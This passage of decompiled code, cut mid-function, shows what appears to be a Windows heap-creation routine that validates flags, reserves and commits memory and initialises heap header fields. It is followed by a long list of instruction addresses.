							if(_t701 == 0) {
								 *(_t733 - 0xc0) = 0;
								E1E1068B3(_t733 - 0xac, _t733 - 0xc0, 0x8000);
							}
						}
						L86:
						return E1E134428(0, _t701, _t721);
					}
					__eflags = _t700 - 0xffffffff;
					if(_t700 != 0xffffffff) {
						L137:
						_t721 = 0;
						goto L81;
					}
					_t700 = 0;
					_t671 =  *(_t733 - 0xb0);
					_t599 =  *(_t733 - 0xd0);
				}
				L1:
				_t672 = _t671 & 0xf1ffffff;
				 *(_t733 - 0xb0) = _t672;
				_t721 = 0;
				if((_t672 & 0x00000100) != 0) {
					__eflags = _t672 & 0x00000002;
					if((_t672 & 0x00000002) == 0) {
						goto L81;
					}
					__eflags =  *(_t733 - 0xb8);
					if( *(_t733 - 0xb8) != 0) {
						goto L81;
					}
					__eflags = _t599;
					if(_t599 != 0) {
						goto L81;
					}
					__eflags =  *(_t733 - 0xc4);
					if( *(_t733 - 0xc4) != 0) {
						goto L81;
					}
					__eflags =  *(_t733 - 0xb4);
					if( *(_t733 - 0xb4) != 0) {
						goto L81;
					}
					__eflags = _t700;
					if(_t700 == 0) {
						L127:
						_t721 = _t733 - 0x4c;
						L3:
						if(_t721 != 0) {
							__eflags = _t721 - _t733 - 0x4c;
							if(_t721 == _t733 - 0x4c) {
								_t703 = 0x30;
								E1E1269F0(_t721, 0, _t703);
								 *_t721 = 1;
								 *((short*)(_t721 + 2)) = _t703;
								 *((intOrPtr*)(_t721 + 0xc)) = 1;
								_t310 = _t721 + 0x10;
								 *_t310 =  *(_t721 + 0x10) | 0xffffffff;
								__eflags =  *_t310;
							}
							_t420 = E1E19D268(_t721);
							_t702 =  *(_t733 - 0xd0);
							_t601 =  *(_t733 - 0xc4);
							__eflags = _t702;
							if(_t702 == 0) {
								_t702 = _t601;
							}
							__eflags = _t601 - _t702;
							if(_t601 > _t702) {
								_t601 = _t702;
							}
							_t721 = E1E1A34EF(E1E18AE34(_t420,  *(_t733 - 0xb0),  *(_t733 - 0xd8)), _t702, _t601, _t420, _t672);
							__eflags = _t721;
							if(_t721 == 0) {
								goto L81;
							} else {
								E1E102A1F(_t721, 0, 1, 0);
								__eflags =  *(_t721 + 0x14);
								if( *(_t721 + 0x14) != 0) {
									goto L81;
								}
								E1E1A3782(_t721);
								goto L137;
							}
						}
						if((_t672 & 0x10000000) != 0) {
							L7:
							_t722 = 0x30;
							E1E1269F0(_t733 - 0xa8, 0, _t722);
							_t736 = _t734 + 0xc;
							if(_t700 != 0) {
								 *((intOrPtr*)(_t733 - 4)) = 0;
								__eflags =  *_t700 - _t722;
								if( *_t700 == _t722) {
									_t662 = 0xc;
									memcpy(_t733 - 0xa8, _t700, _t662 << 2);
									_t736 = _t736 + 0xc;
								}
								 *((intOrPtr*)(_t733 - 4)) = 0xfffffffe;
							}
							_t606 =  *(_t733 - 0xd8);
							_t430 =  *(_t733 - 0xb0);
							if((_t606 & 0x00000010) != 0) {
								_t430 = _t430 | 0x00000020;
								 *(_t733 - 0xb0) = _t430;
							}
							if((_t606 & 0x00000020) != 0) {
								_t430 = _t430 | 0x00000040;
								 *(_t733 - 0xb0) = _t430;
							}
							if((_t606 & 0x00200000) != 0) {
								_t430 = _t430 | 0x00000080;
								 *(_t733 - 0xb0) = _t430;
							}
							if((_t606 & 0x00000040) != 0) {
								_t430 = _t430 | 0x40000000;
								 *(_t733 - 0xb0) = _t430;
							}
							if((0x00000080 & _t606) != 0) {
								_t430 = _t430 | 0x20000000;
								 *(_t733 - 0xb0) = _t430;
							}
							_t679 = 0x1000;
							if((0x00001000 & _t606) != 0) {
								 *(_t733 - 0xb0) = _t430 | 0x08000000;
							}
							_t607 =  *[fs:0x30];
							if( *((intOrPtr*)(_t733 - 0xa4)) == 0) {
								 *((intOrPtr*)(_t733 - 0xa4)) =  *((intOrPtr*)(_t607 + 0x78));
							}
							if( *((intOrPtr*)(_t733 - 0xa0)) == 0) {
								 *((intOrPtr*)(_t733 - 0xa0)) =  *((intOrPtr*)(_t607 + 0x7c));
							}
							if( *(_t733 - 0x9c) == 0) {
								 *(_t733 - 0x9c) =  *(_t607 + 0x84);
							}
							if( *(_t733 - 0x98) == 0) {
								 *(_t733 - 0x98) =  *(_t607 + 0x80);
							}
							_t432 =  *0x1e1d178c; // 0x7ffeffff
							if(_t432 == 0) {
								 *0x1e1d1790 = 0x10000;
								_push(0);
								_push(0x2c);
								_push(_t733 - 0x78);
								_push(0);
								_t434 = E1E120800();
								__eflags = _t434;
								if(_t434 < 0) {
									goto L137;
								}
								_t432 =  *((intOrPtr*)(_t733 - 0x58));
								 *0x1e1d178c = _t432;
								_t679 = 0x1000;
								goto L23;
							} else {
								L23:
								if( *((intOrPtr*)(_t733 - 0x94)) == 0) {
									 *((intOrPtr*)(_t733 - 0x94)) = _t432 -  *0x1e1d1790 - _t679;
								}
								if( *((intOrPtr*)(_t733 - 0x90)) != 0) {
									__eflags =  *((intOrPtr*)(_t733 - 0x90)) - 0x7f000;
									if( *((intOrPtr*)(_t733 - 0x90)) <= 0x7f000) {
										goto L27;
									}
									goto L26;
								} else {
									L26:
									 *((intOrPtr*)(_t733 - 0x90)) = 0x7f000;
									L27:
									_t435 =  *(_t733 - 0xc4);
									if(_t435 != 0) {
										_t679 = _t435 + 0x00000fff & 0xfffff000;
									}
									 *(_t733 - 0xc8) = _t679;
									_t704 =  *(_t733 - 0xd0);
									if(_t704 != 0) {
										_t609 = _t704 + 0x00000fff & 0xfffff000;
									} else {
										_t62 = _t679 + 0xffff; // 0x10fff
										_t609 = _t62 & 0xffff0000;
									}
									 *(_t733 - 0xc0) = _t609;
									_t723 = _t679;
									if(_t679 > _t609) {
										_t679 = _t609;
										 *(_t733 - 0xc8) = _t609;
										_t723 = _t609;
									}
									_t701 = _t723;
									_t436 =  *(_t733 - 0xb0);
									if((_t436 & 0x00000002) == 0 ||  *(_t733 - 0xb8) != 0) {
										 *(_t733 - 0xd8) = 0;
										_t723 = _t701;
									} else {
										 *(_t733 - 0xd8) = 0x1000;
										 *(_t733 - 0xe4) = 2;
										_t70 = _t609 - 0x1000; // 0xffff
										if(_t70 < _t723) {
											_t609 = _t609 + 0x00010fff & 0xffff0000;
											 *(_t733 - 0xc0) = _t609;
										}
										_t436 =  *(_t733 - 0xb0);
									}
									if(_t723 == 0 || _t609 == 0) {
										goto L137;
									} else {
										if((_t436 & 0x61000000) != 0) {
											__eflags = _t436 & 0x10000000;
											if((_t436 & 0x10000000) != 0) {
												goto L38;
											}
											_t721 = _t733 - 0xa8;
											E1E19B1F4(_t436,  *(_t733 - 0xb8), _t609, _t679,  *(_t733 - 0xb4), _t733 - 0xa8);
											goto L86;
										}
										L38:
										 *(_t733 - 0xd0) = 0x258;
										_t673 =  *(_t733 - 0xb4);
										if((_t436 & 0x00000001) != 0) {
											__eflags = _t673;
											if(_t673 == 0) {
												L41:
												_t701 =  *(_t733 - 0xb8);
												if(_t701 != 0) {
													__eflags =  *(_t733 - 0x84);
													if( *(_t733 - 0x84) != 0) {
														_t681 =  *(_t733 - 0x8c);
														__eflags = _t681;
														if(_t681 == 0) {
															L168:
															_t413 =  *(_t733 - 0xbc);
															_t721 = 0;
															_t673 =  *(_t733 - 0xb4);
															goto L83;
														}
														_t610 =  *(_t733 - 0x88);
														__eflags = _t610;
														if(_t610 == 0) {
															goto L168;
														}
														__eflags = _t681 - _t610;
														if(_t681 > _t610) {
															goto L168;
														}
														__eflags = _t436 & 0x00000002;
														if((_t436 & 0x00000002) != 0) {
															goto L168;
														}
														 *(_t733 - 0xcc) = _t701;
														 *(_t733 - 0xc4) = _t701 + _t681;
														 *(_t733 - 0xc0) = _t610;
														E1E1269F0(_t701, 0, 0x1000);
														_t736 = _t736 + 0xc;
														L107:
														_t724 =  *(_t733 - 0xb0);
														L99:
														 *(_t733 - 0xe4) =  *(_t733 - 0xe4) | 0x00000001;
														_t682 = _t701;
														 *(_t733 - 0xac) = _t682;
														_t706 = _t724 & 0x00040000;
														_t611 =  *(_t733 - 0xc4);
														_t439 =  *(_t733 - 0xcc);
														L48:
														if(_t439 != _t611) {
															L54:
															_t707 = _t682 + 0x258;
															if(( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
																 *( *(_t733 - 0xac) + 0xbc) = _t707 + 0x00000007 & 0xfffffff8;
																 *(_t733 - 0xd0) =  *(_t733 - 0xd0) + 0x60c;
																_t707 =  *( *(_t733 - 0xac) + 0xbc) + 0x60c;
																 *(_t733 - 0xb0) =  *(_t733 - 0xb0) | 0x04000000;
																_t724 =  *(_t733 - 0xb0);
															}
															_t445 =  *(_t733 - 0xd0) + 0x00000007 & 0xfffffff8;
															 *(_t733 - 0xe8) = _t445;
															 *( *(_t733 - 0xac)) = _t445 >> 3;
															 *((char*)( *(_t733 - 0xac) + 2)) = 1;
															 *((char*)( *(_t733 - 0xac) + 7)) = 1;
															 *((intOrPtr*)( *(_t733 - 0xac) + 0x60)) = 0xeeffeeff;
															 *( *(_t733 - 0xac) + 0x40) = _t724 & 0xefffffff;
															 *((intOrPtr*)( *(_t733 - 0xac) + 0x58)) = 0;
															E1E1269F0( *(_t733 - 0xac) + 0x1f4, 0, 0x5c);
															E1E1058C5( *(_t733 - 0xac));
															 *((intOrPtr*)( *(_t733 - 0xac) + 0x234)) = 1;
															_t726 =  *(_t733 - 0xac);
															if(( *(_t726 + 0x40) & 0x08000000) != 0) {
																 *(_t726 + 0x58) = E1E197C99(0x1e19a140) & 0x0000ffff;
																 *( *(_t733 - 0xac) + 0x40) =  *( *(_t733 - 0xac) + 0x40) & 0xffffffbf;
																_t726 =  *(_t733 - 0xac);
															}
															_t683 =  *(_t733 - 0xb0);
															 *(_t726 + 0x44) = _t683 & 0x6001007d;
															 *((short*)( *(_t733 - 0xac) + 0x7e)) = _t707 -  *(_t733 - 0xac);
															 *((intOrPtr*)( *(_t733 - 0xac) + 0x80)) = 0;
															_t465 =  *(_t733 - 0xac) + 0xc0;
															 *((intOrPtr*)(_t465 + 4)) = _t465;
															 *_t465 = _t465;
															_t467 =  *(_t733 - 0xac) + 0x9c;
															 *((intOrPtr*)(_t467 + 4)) = _t467;
															 *_t467 = _t467;
															_t469 =  *(_t733 - 0xac) + 0xa4;
															 *((intOrPtr*)(_t469 + 4)) = _t469;
															 *_t469 = _t469;
															_t471 =  *(_t733 - 0xac) + 0x8c;
															 *((intOrPtr*)(_t471 + 4)) = _t471;
															 *_t471 = _t471;
															if( *(_t733 - 0xbc) != 0 || (_t683 & 0x00000001) != 0) {
																L60:
																 *( *(_t733 - 0xac) + 0xc8) =  *(_t733 - 0xbc);
																 *( *(_t733 - 0xac) + 0x48) =  *( *(_t733 - 0xac) + 0x48) | 0x80000000;
																if(E1E1061FC( *(_t733 - 0xac),  *(_t733 - 0xac),  *(_t733 - 0xe8) + 0x238,  *(_t733 - 0xbc),  *(_t733 - 0xe4),  *(_t733 - 0xcc),  *(_t733 - 0xc4),  *(_t733 - 0xcc) -  *(_t733 - 0xd8) +  *(_t733 - 0xc0)) == 0) {
																	L167:
																	_t701 =  *(_t733 - 0xb8);
																	goto L168;
																}
																if( *(_t733 - 0xb8) != 0) {
																	E1E1269F0(_t707, 0, 0x80);
																}
																 *((intOrPtr*)(_t707 + 4)) = 0x80;
																_t623 = _t707 + 0x24;
																 *((intOrPtr*)(_t707 + 0x1c)) = _t623;
																 *(_t707 + 0x18) =  *(_t733 - 0xac) + 0xc0;
																 *((intOrPtr*)(_t707 + 0x20)) = _t623 + 0x10;
																E1E105CF9( *(_t733 - 0xac), _t707);
																 *((short*)( *(_t733 - 0xac) + 0x7c)) = 0;
																 *((intOrPtr*)( *(_t733 - 0xac) + 0x64)) =  *((intOrPtr*)(_t733 - 0xa4));
																 *((intOrPtr*)( *(_t733 - 0xac) + 0x68)) =  *((intOrPtr*)(_t733 - 0xa0));
																 *( *(_t733 - 0xac) + 0x6c) =  *(_t733 - 0x9c) >> 3;
																 *( *(_t733 - 0xac) + 0x70) =  *(_t733 - 0x98) >> 3;
																 *((intOrPtr*)( *(_t733 - 0xac) + 0x78)) =  *((intOrPtr*)(_t733 - 0x94));
																 *( *(_t733 - 0xac) + 0x5c) =  *((intOrPtr*)(_t733 - 0x90)) + 7 >> 3;
																 *( *(_t733 - 0xac) + 0xcc) =  *(_t733 - 0x84) ^  *0x1e1d1ac8;
																 *((intOrPtr*)( *(_t733 - 0xac) + 0x250)) = 4;
																 *((intOrPtr*)( *(_t733 - 0xac) + 0x254)) = 0xfe000;
																_t687 = 1;
																if(( *0x1e1d1784 & 1) != 0) {
																	 *( *(_t733 - 0xac) + 0x48) = 1;
																}
																_t638 =  *(_t733 - 0xb0);
																_t497 =  *(_t733 - 0xac);
																if((_t638 & 0x00010000) != 0) {
																	 *((intOrPtr*)(_t497 + 0x94)) = 0x17;
																	 *((intOrPtr*)( *(_t733 - 0xac) + 0x98)) = 0xfffffff0;
																} else {
																	 *((intOrPtr*)(_t497 + 0x94)) = 0xf;
																	 *((intOrPtr*)( *(_t733 - 0xac) + 0x98)) = 0xfffffff8;
																}
																_t499 =  *(_t733 - 0xac);
																if(( *(_t499 + 0x40) & 0x00000020) != 0) {
																	 *((intOrPtr*)(_t499 + 0x94)) =  *((intOrPtr*)(_t499 + 0x94)) + 8;
																	_t499 =  *(_t733 - 0xac);
																}
																 *((intOrPtr*)(_t499 + 0xe4)) = 0;
																 *((short*)( *(_t733 - 0xac) + 0xe8)) = 0;
																 *((char*)( *(_t733 - 0xac) + 0xea)) = 0;
																 *((char*)( *(_t733 - 0xac) + 0xeb)) = 0;
																 *((intOrPtr*)( *(_t733 - 0xac) + 0xb8)) = 0;
																_t505 = _t638 & 0x00000003;
																_t639 = _t638 & 0xffffff00 | _t505 == 0x00000002;
																if(((_t505 & 0xffffff00 | ( *0x1e1d1784 & _t687) == 0x00000000) & (_t638 & 0xffffff00 | _t505 == 0x00000002)) == 0) {
																	L69:
																	E1E102A1F( *(_t733 - 0xac), 0, _t687, 0);
																	if( *((intOrPtr*)( *(_t733 - 0xac) + 0x7c)) == 0) {
																		goto L167;
																	}
																	_t509 = E1E0F5440();
																	_t728 = 0x7ffe0380;
																	if(_t509 != 0) {
																		_t512 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																	} else {
																		_t512 = 0x7ffe0380;
																	}
																	if( *_t512 != 0) {
																		_t513 =  *[fs:0x30];
																		__eflags =  *(_t513 + 0x240) & 0x00000001;
																		if(( *(_t513 + 0x240) & 0x00000001) == 0) {
																			goto L73;
																		}
																		__eflags = E1E0F5440();
																		if(__eflags != 0) {
																			_t728 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																			__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																		}
																		_t729 =  *(_t733 - 0xb0);
																		E1E199503(0,  *(_t733 - 0xac),  *(_t733 - 0xb0), 0, __eflags,  *(_t733 - 0xc0),  *(_t733 - 0xc8),  *_t728 & 0x000000ff);
																		goto L74;
																	} else {
																		L73:
																		_t729 =  *(_t733 - 0xb0);
																		L74:
																		_t514 = E1E0F5440();
																		_t710 = 0x7ffe038a;
																		if(_t514 != 0) {
																			_t517 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																		} else {
																			_t517 = 0x7ffe038a;
																		}
																		if( *_t517 != 0) {
																			__eflags = E1E0F5440();
																			if(__eflags != 0) {
																				_t710 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																				__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
																			}
																			E1E199503(0,  *(_t733 - 0xac), _t729, _t710, __eflags,  *(_t733 - 0xc0),  *(_t733 - 0xc8),  *_t710 & 0x000000ff);
																		}
																		if(E1E0F5440() != 0) {
																			_t524 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
																		} else {
																			_t524 = 0x7ffe0388;
																		}
																		if( *_t524 != 0) {
																			E1E197CE5(0,  *(_t733 - 0xac),  *(_t733 - 0xc0), _t729);
																		}
																		 *( *(_t733 - 0xac) + 0x48) =  *( *(_t733 - 0xac) + 0x48) & 0x7fffffff;
																		 *((intOrPtr*)( *(_t733 - 0xac) + 0xd0)) = 0;
																		_t721 =  *(_t733 - 0xac);
																		 *(_t733 - 0xac) = 0;
																		goto L81;
																	}
																} else {
																	 *((intOrPtr*)( *(_t733 - 0xac) + 0xec)) = E1E0F1F00(_t639,  *(_t733 - 0xac), 0x80000a, 0x100);
																	_t535 =  *((intOrPtr*)( *(_t733 - 0xac) + 0xec));
																	if(_t535 == 0) {
																		goto L167;
																	}
																	_t687 = 1;
																	 *((char*)(_t535 - 1)) = 1;
																	 *((short*)( *(_t733 - 0xac) + 0xf0)) = 0x80;
																	goto L69;
																}
															} else {
																 *(_t733 - 0xbc) = _t707;
																if(E1E106390(_t707, 0, 0x10000000) < 0) {
																	goto L137;
																}
																_t707 = _t707 + 0x18;
																goto L60;
															}
														}
														asm("sbb edi, edi");
														_push(( ~_t706 & 0x0000003c) + 4);
														_push(0x1000);
														_push(_t733 - 0xc8);
														_push(0);
														_push(_t733 - 0xcc);
														_push(0xffffffff);
														if(E1E120600() < 0) {
															goto L167;
														}
														if(E1E0F5440() != 0) {
															_t646 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
														} else {
															_t646 = 0x7ffe0380;
														}
														if( *_t646 != 0) {
															_t544 =  *[fs:0x30];
															__eflags =  *(_t544 + 0x240) & 0x00000001;
															if(( *(_t544 + 0x240) & 0x00000001) != 0) {
																E1E1993ED(0,  *(_t733 - 0xac),  *(_t733 - 0xcc),  *(_t733 - 0xc8), 1);
															}
														}
														 *(_t733 - 0xc4) =  *(_t733 - 0xc4) +  *(_t733 - 0xc8);
														_t682 =  *(_t733 - 0xac);
														goto L54;
													}
													_push(0);
													_push(0x1c);
													_push(_t733 - 0x110);
													_push(0);
													_push(_t701);
													_push(0xffffffff);
													_t547 = E1E1206D0();
													__eflags = _t547;
													if(_t547 < 0) {
														goto L168;
													}
													_t548 =  *(_t733 - 0x110);
													 *(_t733 - 0xc4) = _t548;
													__eflags = _t548 - _t701;
													if(_t548 != _t701) {
														goto L168;
													}
													__eflags =  *((intOrPtr*)(_t733 - 0x100)) - 0x10000;
													if( *((intOrPtr*)(_t733 - 0x100)) == 0x10000) {
														goto L168;
													}
													 *(_t733 - 0xcc) = _t548;
													__eflags =  *((intOrPtr*)(_t733 - 0x100)) - 0x1000;
													if( *((intOrPtr*)(_t733 - 0x100)) != 0x1000) {
														_t651 =  *(_t733 - 0x104);
														 *(_t733 - 0xc0) = _t651;
														_t549 =  *(_t733 - 0xc8);
														__eflags = _t549 - _t651;
														if(_t549 > _t651) {
															_t549 = _t651;
															 *(_t733 - 0xc8) = _t549;
														}
														__eflags = _t549 - 0x1000;
														if(_t549 < 0x1000) {
															goto L168;
														} else {
															goto L107;
														}
													}
													_t724 =  *(_t733 - 0xb0);
													__eflags = _t724 & 0x00040000;
													if((_t724 & 0x00040000) != 0) {
														__eflags =  *(_t733 - 0xfc) & 0x00000040;
														if(( *(_t733 - 0xfc) & 0x00000040) == 0) {
															goto L168;
														}
													}
													E1E1269F0(_t548, 0, 0x1000);
													_t736 = _t736 + 0xc;
													_push(0);
													_push(0x14);
													_push(_t733 - 0x124);
													_push(3);
													_push(_t701);
													_push(0xffffffff);
													_t552 = E1E1206D0();
													__eflags = _t552;
													if(_t552 < 0) {
														goto L168;
													}
													 *(_t733 - 0xc0) =  *(_t733 - 0x118);
													_t554 =  *(_t733 - 0x104);
													 *(_t733 - 0xc8) = _t554;
													_t555 =  *(_t733 - 0xcc) + _t554;
													__eflags = _t555;
													 *(_t733 - 0xc4) = _t555;
													goto L99;
												}
												 *(_t733 - 0xdc) = 0;
												 *(_t733 - 0xd4) = 0;
												if( *(_t733 - 0x84) != _t701) {
													_t721 = 0;
													_t413 =  *(_t733 - 0xbc);
													goto L83;
												}
												 *(_t733 - 0xe8) = E1E105C20(_t609);
												_t560 = (E1E105C20(_t609) & 0x0000001f) << 0x10;
												 *(_t733 - 0xd4) = _t560;
												_t652 =  *(_t733 - 0xc0);
												_t561 = _t560 + _t652;
												 *(_t733 - 0xe0) = _t561;
												if(_t561 < _t652) {
													 *(_t733 - 0xe0) = _t652;
													 *(_t733 - 0xd4) = 0;
												}
												_t724 =  *(_t733 - 0xb0);
												_t706 = _t724 & 0x00040000;
												asm("sbb eax, eax");
												_push(( ~_t706 & 0x0000003c) + 4);
												_push(0x2000);
												_push(_t733 - 0xe0);
												_push(0);
												_push(_t733 - 0xdc);
												_push(0xffffffff);
												if(E1E120600() < 0) {
													goto L167;
												} else {
													_t682 =  *(_t733 - 0xdc);
													 *(_t733 - 0xac) = _t682;
													 *(_t733 - 0xc0) =  *(_t733 - 0xe0);
													if( *(_t733 - 0xd4) != 0) {
														E1E1068B3(_t733 - 0xdc, _t733 - 0xd4, 0x8000);
														_t682 =  *(_t733 - 0xdc) +  *(_t733 - 0xd4);
														 *(_t733 - 0xac) = _t682;
														 *(_t733 - 0xc0) =  *(_t733 - 0xe0) -  *(_t733 - 0xd4);
													}
													_t439 = _t682;
													 *(_t733 - 0xcc) = _t439;
													_t611 = _t682;
													 *(_t733 - 0xc4) = _t611;
													goto L48;
												}
											}
											_t721 = 0;
											goto L82;
										}
										if(_t673 != 0) {
											_t436 = _t436 | 0x80000000;
											 *(_t733 - 0xb0) = _t436;
										}
										asm("sbb ecx, ecx");
										 *(_t733 - 0xbc) =  ~_t673 & _t673;
										asm("sbb ecx, ecx");
										_t609 = ( ~_t673 & 0xffffffe8) + 0x270;
										 *(_t733 - 0xd0) = ( ~_t673 & 0xffffffe8) + 0x270;
										goto L41;
									}
								}
							}
						}
						if( *0x1e1d17b0 >= 2) {
							__eflags = _t672 & 0xfff80c00;
							if((_t672 & 0xfff80c00) == 0) {
								goto L7;
							}
							_t583 =  *[fs:0x30];
							__eflags =  *(_t583 + 0xc);
							if( *(_t583 + 0xc) == 0) {
								_push("HEAP: ");
								E1E0DB1F0();
							} else {
								E1E0DB1F0("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("!(CheckedFlags & ~HEAP_CREATE_VALID_MASK)");
							E1E0DB1F0();
							__eflags =  *0x1e1d0c68; // 0x0
							if(__eflags == 0) {
								_t666 = 2;
								E1E19A0D5(0, _t666, _t700, __eflags);
							}
							_t672 =  *(_t733 - 0xb0);
						}
						if((_t672 & 0xfff80c00) != 0) {
							 *(_t733 - 0xb0) = _t672 & 0x0007f3ff;
						}
						goto L7;
					}
					_t721 = _t700;
					_t592 = E1E19D2B4(_t700, _t672);
					__eflags = _t592;
					if(_t592 == 0) {
						goto L137;
					}
					_t672 =  *(_t733 - 0xb0);
					goto L3;
				}
				if(( *0x1e1d1788 & 0x00000001) != 0) {
					__eflags = _t672 & 0x00000002;
					if((_t672 & 0x00000002) == 0) {
						goto L3;
					}
					__eflags =  *(_t733 - 0xb8);
					if( *(_t733 - 0xb8) != 0) {
						goto L3;
					}
					__eflags = _t700;
					if(_t700 == 0) {
						L126:
						__eflags =  *(_t733 - 0xb4);
						if( *(_t733 - 0xb4) != 0) {
							goto L3;
						}
						goto L127;
					}
					_t593 = E1E19D299(_t700);
					__eflags = _t593;
					if(_t593 == 0) {
						goto L3;
					}
					goto L126;
				}
				goto L3;
			}













































































                        0x1e104ee0
                        0x1e104ee5
                        0x1e104eea
                        0x1e104eef
                        0x1e104ef2
                        0x1e104ef8
                        0x1e104efb
                        0x1e104f01
                        0x1e104f04
                        0x1e104f0a
                        0x1e104f10
                        0x1e104f13
                        0x1e104f19
                        0x1e104f1c
                        0x1e104f22
                        0x1e104f28
                        0x1e104f34
                        0x1e104f3c
                        0x1e104f42
                        0x1e104f4a
                        0x1e104f50
                        0x1e104f56
                        0x1e14a98e
                        0x1e14a994
                        0x00000000
                        0x00000000
                        0x1e14a99a
                        0x1e14a9a0
                        0x00000000
                        0x00000000
                        0x1e14a9ac
                        0x1e14a9b4
                        0x1e14a9ba
                        0x1e14a9bc
                        0x1e14a9be
                        0x1e14a9c0
                        0x1e10570f
                        0x1e10570f
                        0x1e105715
                        0x1e105715
                        0x1e10571b
                        0x1e10571d
                        0x1e10571f
                        0x1e14aefd
                        0x1e14aeff
                        0x1e14af05
                        0x1e14af06
                        0x1e14af06
                        0x1e14aeff
                        0x1e10572c
                        0x1e14af10
                        0x1e14af12
                        0x1e14af18
                        0x1e14af30
                        0x1e14af30
                        0x1e14af12
                        0x1e105734
                        0x1e105739
                        0x1e105739
                        0x1e14a9c6
                        0x1e14a9c9
                        0x1e14aafc
                        0x1e14aafc
                        0x00000000
                        0x1e14aafc
                        0x1e14a9cf
                        0x1e14a9d1
                        0x1e14a9d7
                        0x1e14a9d7
                        0x1e104f5c
                        0x1e104f5c
                        0x1e104f62
                        0x1e104f68
                        0x1e104f70
                        0x1e14a9e2
                        0x1e14a9e5
                        0x00000000
                        0x00000000
                        0x1e14a9eb
                        0x1e14a9f1
                        0x00000000
                        0x00000000
                        0x1e14a9f7
                        0x1e14a9f9
                        0x00000000
                        0x00000000
                        0x1e14a9ff
                        0x1e14aa05
                        0x00000000
                        0x00000000
                        0x1e14aa0b
                        0x1e14aa11
                        0x00000000
                        0x00000000
                        0x1e14aa17
                        0x1e14aa19
                        0x1e14aa6b
                        0x1e14aa6b
                        0x1e104f83
                        0x1e104f85
                        0x1e14aa76
                        0x1e14aa78
                        0x1e14aa7c
                        0x1e14aa80
                        0x1e14aa8b
                        0x1e14aa8e
                        0x1e14aa92
                        0x1e14aa95
                        0x1e14aa95
                        0x1e14aa95
                        0x1e14aa95
                        0x1e14aa9b
                        0x1e14aaa0
                        0x1e14aaa6
                        0x1e14aaac
                        0x1e14aaae
                        0x1e14aab0
                        0x1e14aab0
                        0x1e14aab2
                        0x1e14aab4
                        0x1e14aab6
                        0x1e14aab6
                        0x1e14aad5
                        0x1e14aad7
                        0x1e14aad9
                        0x00000000
                        0x1e14aadf
                        0x1e14aae6
                        0x1e14aaeb
                        0x1e14aaef
                        0x00000000
                        0x00000000
                        0x1e14aaf7
                        0x00000000
                        0x1e14aaf7
                        0x1e14aad9
                        0x1e104f91
                        0x1e104fac
                        0x1e104fae
                        0x1e104fb8
                        0x1e104fbd
                        0x1e104fc2
                        0x1e105861
                        0x1e105864
                        0x1e105866
                        0x1e10586a
                        0x1e105873
                        0x1e105873
                        0x1e105873
                        0x1e105875
                        0x1e105875
                        0x1e104fc8
                        0x1e104fce
                        0x1e104fd7
                        0x1e14aba5
                        0x1e14aba8
                        0x1e14aba8
                        0x1e104fe0
                        0x1e14abb3
                        0x1e14abb6
                        0x1e14abb6
                        0x1e104ff1
                        0x1e14abc1
                        0x1e14abc3
                        0x1e14abc3
                        0x1e104ffa
                        0x1e14abce
                        0x1e14abd3
                        0x1e14abd3
                        0x1e105002
                        0x1e14abde
                        0x1e14abe3
                        0x1e14abe3
                        0x1e105008
                        0x1e10500f
                        0x1e14abf3
                        0x1e14abf3
                        0x1e105015
                        0x1e105023
                        0x1e105028
                        0x1e105028
                        0x1e105035
                        0x1e10503a
                        0x1e10503a
                        0x1e105047
                        0x1e10504f
                        0x1e10504f
                        0x1e10505c
                        0x1e105064
                        0x1e105064
                        0x1e10506a
                        0x1e105071
                        0x1e14abfe
                        0x1e14ac08
                        0x1e14ac09
                        0x1e14ac0e
                        0x1e14ac0f
                        0x1e14ac10
                        0x1e14ac15
                        0x1e14ac17
                        0x00000000
                        0x00000000
                        0x1e14ac1d
                        0x1e14ac20
                        0x1e14ac25
                        0x00000000
                        0x1e105077
                        0x1e105077
                        0x1e10507e
                        0x1e105088
                        0x1e105088
                        0x1e105095
                        0x1e14ac2f
                        0x1e14ac39
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e10509b
                        0x1e10509b
                        0x1e10509b
                        0x1e1050a5
                        0x1e1050a5
                        0x1e1050ad
                        0x1e105742
                        0x1e105742
                        0x1e1050b3
                        0x1e1050b9
                        0x1e1050c1
                        0x1e105887
                        0x1e1050c7
                        0x1e1050c7
                        0x1e1050cd
                        0x1e1050cd
                        0x1e1050d3
                        0x1e1050d9
                        0x1e1050dd
                        0x1e14ac44
                        0x1e14ac46
                        0x1e14ac4c
                        0x1e14ac4c
                        0x1e1050e3
                        0x1e1050e5
                        0x1e1050ed
                        0x1e10575a
                        0x1e105760
                        0x1e105100
                        0x1e105100
                        0x1e10510a
                        0x1e105114
                        0x1e10511c
                        0x1e14ac59
                        0x1e14ac5f
                        0x1e14ac5f
                        0x1e105122
                        0x1e105122
                        0x1e10512a
                        0x00000000
                        0x1e105138
                        0x1e10513d
                        0x1e14ac6a
                        0x1e14ac6f
                        0x00000000
                        0x00000000
                        0x1e14ac75
                        0x1e14ac8c
                        0x00000000
                        0x1e14ac8c
                        0x1e105143
                        0x1e105143
                        0x1e10514d
                        0x1e105155
                        0x1e10574d
                        0x1e10574f
                        0x1e105186
                        0x1e105186
                        0x1e10518e
                        0x1e105767
                        0x1e10576e
                        0x1e14acad
                        0x1e14acb3
                        0x1e14acb5
                        0x1e14acf8
                        0x1e14acf8
                        0x1e14acfe
                        0x1e14ad00
                        0x00000000
                        0x1e14ad00
                        0x1e14acb7
                        0x1e14acbd
                        0x1e14acbf
                        0x00000000
                        0x00000000
                        0x1e14acc1
                        0x1e14acc3
                        0x00000000
                        0x00000000
                        0x1e14acc5
                        0x1e14acc7
                        0x00000000
                        0x00000000
                        0x1e14acc9
                        0x1e14acd2
                        0x1e14acd8
                        0x1e14ace5
                        0x1e14acea
                        0x1e1058b0
                        0x1e1058b0
                        0x1e105829
